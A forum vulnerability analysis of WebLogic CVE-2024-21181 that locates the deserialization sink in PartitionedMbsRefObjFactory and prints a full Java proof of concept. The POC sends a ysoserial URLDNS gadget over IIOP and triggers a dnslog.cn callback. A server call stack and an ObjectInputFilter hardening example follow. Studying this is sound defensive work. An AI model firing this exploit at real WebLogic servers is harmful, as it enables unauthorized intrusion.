Analysis of the WebLogic T3/IIOP Deserialization Vulnerability CVE-2024-21181
Posted by 21superman from Beijing · Vulnerability analysis · 2763 views · 2024-07-29 05:11

1. Analysis of the vulnerability principle
Oracle's July patch release includes a fix for CVE-2024-21181, a WebLogic vulnerability rated 9.8. Its impact is significant: unlike JNDI injection, it can be exploited even when the server has no outbound network access. There are no public analyses of it yet, and since I had not looked at WebLogic for a while, I did a brief analysis. WebLogic fixed the T3/IIOP deserialization vulnerabilities with a whitelist, which should not be bypassable, so I followed the approach from the article "CVE-2024-21006 WebLogic Remote Code Execution: a hunting approach"
https://xz.aliyun.com/t/14305?time__1311=GqAxuD9QiQdYqGNDQ0PBKvTzCqi%3DDgD8aoD
which suggests looking at the getObjectInstance methods of ObjectFactory classes to find exploitation points.

2. Finding the exploitation point
The getObjectInstance method of the class weblogic.management.mbeanservers.partition.PartitionedMbsRefObjFactory turns out to be problematic.

Stepping into its deserialize method reveals a deserialization vulnerability.

The call stack is as follows:

3. The key: how to write the POC
The key to exploiting this vulnerability is getting the server to execute getObjectInstance through context.lookup(name) while passing in the payload.
The core step is creating a Reference, and PartitionedMbsRefObjFactory itself already shows us how to build one.
The code is as follows:
StringRefAddr addr = new StringRefAddr("partitionName", "test");
Reference reference = new Reference(MBeanServer.class.getName(), addr, PartitionedDomainRuntimeMbsRefObjFactory.class.getName(), (String)null);
RefAddr jvmIdAddr = new BinaryRefAddr("jvmId", payload);
reference.add(jvmIdAddr);
return reference;
When creating the Reference, add a BinaryRefAddr whose bytes are the serialized payload.
The full POC is as follows:

package org.example;

import weblogic.management.mbeanservers.partition.PartitionedDomainRuntimeMbsRefObjFactory;
import weblogic.management.mbeanservers.partition.PartitionedMbsRefObjFactory;
// URLDNS is assumed to be ysoserial's payload class (ysoserial.payloads.URLDNS), which the original omitted.
import ysoserial.payloads.URLDNS;
import javax.management.MBeanServer;
import javax.naming.*;
import java.lang.reflect.Method;
import java.util.Hashtable;

public class VulTest {

    // Serialize the gadget object with the factory's own private serialize(Object) method,
    // so the bytes are in exactly the form deserialize(byte[]) expects.
    private static byte[] getPayload(String url) throws Exception{
        PartitionedMbsRefObjFactory obj=new PartitionedDomainRuntimeMbsRefObjFactory();
        Method serializeMethod= PartitionedMbsRefObjFactory.class.getDeclaredMethod("serialize",Object.class);
        serializeMethod.setAccessible(true);
        Object o=new URLDNS().getObject(url);
        return (byte[]) serializeMethod.invoke(obj,o);
    }

    // Build the Reference the same way the factory does, with the payload in the "jvmId" BinaryRefAddr.
    private static Reference createReference(byte[] payload) {
        StringRefAddr addr = new StringRefAddr("partitionName", "test");
        Reference reference = new Reference(MBeanServer.class.getName(), addr, PartitionedDomainRuntimeMbsRefObjFactory.class.getName(), (String)null);
        RefAddr jvmIdAddr = new BinaryRefAddr("jvmId", payload);
        reference.add(jvmIdAddr);
        return reference;
    }

    public static void main(String[] args) throws Exception{
        String ip = "127.0.0.1";
        String port = "7001";
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
        String url="http://5d6xyy.dnslog.cn";
        byte[] payload=getPayload(url);
        String name="test";
        Reference reference=createReference(payload);
        // rebind stores the Reference; the subsequent lookup makes the server run getObjectInstance on it
        context.rebind(name,reference);
        context.lookup(name);
    }
}

The vulnerability call stack is as follows:

getObjectInstance:46, PartitionedMbsRefObjFactory (weblogic.management.mbeanservers.partition)
getObjectInstance:331, NamingManager (javax.naming.spi)
lookup:308, WLEventContextImpl (weblogic.jndi.internal)
lookup:435, WLContextImpl (weblogic.jndi.internal)
lookup:417, InitialContext (javax.naming)
resolveObject:460, NamingContextImpl (weblogic.corba.cos.naming)
resolve_any:367, NamingContextImpl (weblogic.corba.cos.naming)
_invoke:114, _NamingContextAnyImplBase (weblogic.corba.cos.naming)
invoke:249, CorbaServerRef (weblogic.corba.idl)
invoke:246, ClusterableServerRef (weblogic.rmi.cluster)
run:534, BasicServerRef$2 (weblogic.rmi.internal)
doAs:386, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:163, SecurityManager (weblogic.security.service)
handleRequest:531, BasicServerRef (weblogic.rmi.internal)
run:138, WLSExecuteRequest (weblogic.rmi.internal.wls)
_runAs:352, ComponentInvocationContextManager (weblogic.invocation)
runAs:337, ComponentInvocationContextManager (weblogic.invocation)
doRunWorkUnderContext:57, LivePartitionUtility (weblogic.work)
runWorkUnderContext:41, PartitionUtility (weblogic.work)
runWorkUnderContext:655, SelfTuningWorkManagerImpl (weblogic.work)
execute:420, ExecuteThread (weblogic.work)
run:360, ExecuteThread (weblogic.work)

Looking at the latest July patch, validation has been added to the deserialization step.
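To illustrate what such validation looks like, here is an added example (not WebLogic's code and not the patch itself) of a hardened stand-in for the factory's deserialize step: a JEP 290 ObjectInputFilter restricts the "jvmId" bytes to one expected class and rejects everything else. ExpectedJvmId is a hypothetical placeholder, since the page does not name the real jvmId type; Java 9 or later is assumed for java.io.ObjectInputFilter.

```java
import java.io.*;
import javax.naming.BinaryRefAddr;
import javax.naming.RefAddr;
import javax.naming.Reference;

public class JvmIdFilterDemo {

    // Hypothetical stand-in for the type the "jvmId" address is expected to carry.
    // It holds only a primitive, so the filter sees exactly one class in the stream.
    public static final class ExpectedJvmId implements Serializable {
        private static final long serialVersionUID = 1L;
        final long id;
        ExpectedJvmId(long id) { this.id = id; }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    // Allow-list filter: only ExpectedJvmId may be reconstructed; "!*" rejects any other class,
    // and the depth/size limits bound what a crafted stream can make the server parse.
    static Object deserializeJvmId(byte[] content) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
                ExpectedJvmId.class.getName() + ";!*;maxdepth=3;maxbytes=4096");
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(content))) {
            ois.setObjectInputFilter(filter);
            return ois.readObject();
        }
    }

    // Mirrors the factory's use of the Reference: read the "jvmId" BinaryRefAddr, then deserialize under the filter.
    static Object resolveJvmId(Reference ref) throws Exception {
        RefAddr addr = ref.get("jvmId");
        if (addr == null || !(addr.getContent() instanceof byte[]))
            throw new IllegalArgumentException("jvmId must be a BinaryRefAddr");
        return deserializeJvmId((byte[]) addr.getContent());
    }

    public static void main(String[] args) throws Exception {
        Reference ok = new Reference("demo");                       // constructed sample input
        ok.add(new BinaryRefAddr("jvmId", serialize(new ExpectedJvmId(1L))));
        System.out.println("accepted: " + resolveJvmId(ok).getClass().getSimpleName());
        Reference other = new Reference("demo");                    // harmless but unexpected class
        other.add(new BinaryRefAddr("jvmId", serialize(new java.util.HashMap<String, String>())));
        try { resolveJvmId(other); }
        catch (InvalidClassException e) { System.out.println("rejected: " + e.getMessage()); }
    }
}
```

The second Reference is refused with an InvalidClassException before any class outside the allow-list is instantiated, which is the property a filter on this code path needs to provide.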
